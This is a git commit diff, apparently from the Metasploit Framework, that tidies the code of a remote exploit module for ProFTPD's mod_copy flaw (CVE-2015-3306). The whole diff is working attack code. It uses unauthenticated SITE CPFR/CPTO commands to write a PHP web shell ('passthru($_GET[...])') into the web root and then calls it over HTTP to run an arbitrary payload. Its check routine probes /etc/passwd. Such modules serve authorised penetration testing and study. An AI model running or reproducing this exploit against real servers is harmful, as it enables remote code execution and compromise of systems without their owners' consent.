Clean up module
William Vu
parent
92c91c76f7
commit
5ab882a8d4
|
|
@ -6,6 +6,7 @@
|
|||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
|
|
@ -30,7 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2015-3306'],
|
||||
[ 'CVE', '2015-3306' ],
|
||||
[ 'EDB', '36742' ],
|
||||
],
|
||||
'Privileged' => false,
|
||||
|
|
@ -57,91 +58,91 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
OptPort.new('RPORT', [true, 'HTTP port', 80]),
|
||||
OptPort.new('RPORT_FTP', [true, 'FTP port', 21]),
|
||||
OptString.new('SITEPATH', [true, 'Absolute writable website path', '/var/www']),
|
||||
OptString.new('TMPPATH', [true, 'Absolute writable/executable path', '/tmp']),
|
||||
OptString.new('TARGETURI', [true, 'Base path to the website', '/'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def check
|
||||
ftp_port = datastore['RPORT_FTP']
|
||||
sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => ftp_port })
|
||||
sock = Rex::Socket.create_tcp('PeerHost' => rhost, 'PeerPort' => ftp_port)
|
||||
|
||||
if sock.nil?
|
||||
fail_with(Failure::Unreachable, "#{rhost}:#{@remoting_port.to_s} - Failed to connect to remoting service")
|
||||
fail_with(Failure::Unreachable, "#{rhost}:#{ftp_port} - Failed to connect to FTP server")
|
||||
else
|
||||
print_status("#{rhost}:#{ftp_port} - Connected to FTP server")
|
||||
end
|
||||
|
||||
res = sock.get_once(-1,10)
|
||||
unless ( res and res =~ /220/ )
|
||||
unless res && res.include?('220')
|
||||
fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner")
|
||||
end
|
||||
|
||||
sock.puts("SITE CPFR /etc/passwd\r\n")
|
||||
res = sock.get_once(-1,10)
|
||||
if res and res =~ /350/
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
if res && res.include?('350')
|
||||
Exploit::CheckCode::Vulnerable
|
||||
else
|
||||
return Exploit::CheckCode::Safe
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
ftp_port = datastore['RPORT_FTP']
|
||||
get_arg = rand_text_alphanumeric(5+rand(3))
|
||||
payload_name = rand_text_alphanumeric(5+rand(3)) + '.php'
|
||||
|
||||
sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => ftp_port })
|
||||
sock = Rex::Socket.create_tcp('PeerHost' => rhost, 'PeerPort' => ftp_port)
|
||||
|
||||
if sock.nil?
|
||||
fail_with(Failure::Unreachable, "#{rhost}:#{@remoting_port.to_s} - Failed to connect to remoting service")
|
||||
fail_with(Failure::Unreachable, "#{rhost}:#{ftp_port} - Failed to connect to FTP server")
|
||||
else
|
||||
print_status("#{rhost}:#{ftp_port} - Connected to FTP server")
|
||||
end
|
||||
|
||||
res = sock.get_once(-1,10)
|
||||
unless ( res and res =~ /220/ )
|
||||
unless res && res.include?('220')
|
||||
fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner")
|
||||
end
|
||||
|
||||
print_status("#{rhost}:21 - Sending copy commands to FTP server")
|
||||
print_status("#{rhost}:#{ftp_port} - Sending copy commands to FTP server")
|
||||
|
||||
sock.puts("SITE CPFR /proc/self/cmdline\r\n")
|
||||
res = sock.get_once(-1,10)
|
||||
unless ( res and res =~ /350/ )
|
||||
unless res && res.include?('350')
|
||||
fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying from /proc/self/cmdline")
|
||||
end
|
||||
|
||||
sock.put("SITE CPTO /tmp/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n")
|
||||
sock.put("SITE CPTO #{datastore['TMPPATH']}/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n")
|
||||
res = sock.get_once(-1,10)
|
||||
unless ( res and res =~ /250/ )
|
||||
unless res && res.include?('250')
|
||||
fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying to temporary payload file")
|
||||
end
|
||||
|
||||
sock.put("SITE CPFR /tmp/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n")
|
||||
sock.put("SITE CPFR #{datastore['TMPPATH']}/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n")
|
||||
res = sock.get_once(-1,10)
|
||||
unless ( res and res =~ /350/ )
|
||||
unless res && res.include?('350')
|
||||
fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying from temporary payload file")
|
||||
end
|
||||
|
||||
sock.put("SITE CPTO #{datastore['SITEPATH']}/#{payload_name}\r\n")
|
||||
res = sock.get_once(-1,10)
|
||||
unless ( res and res =~ /250/ )
|
||||
unless res && res.include?('250')
|
||||
fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying PHP payload to website path, directory not writable?")
|
||||
end
|
||||
|
||||
sock.close
|
||||
|
||||
print_status("#{peer} - Executing PHP payload #{target_uri.path}#{payload_name}")
|
||||
res = send_request_cgi!({
|
||||
res = send_request_cgi!(
|
||||
'uri' => normalize_uri(target_uri.path, payload_name),
|
||||
'method' => 'GET',
|
||||
'vars_get' => { get_arg => "nohup #{payload.encoded} &" },
|
||||
})
|
||||
)
|
||||
|
||||
unless ( res and res.code == 200 )
|
||||
fail_with(Failure::Unknown, "#{rhost}:21 - Failure executing payload")
|
||||
unless res && res.code == 200
|
||||
fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure executing payload")
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue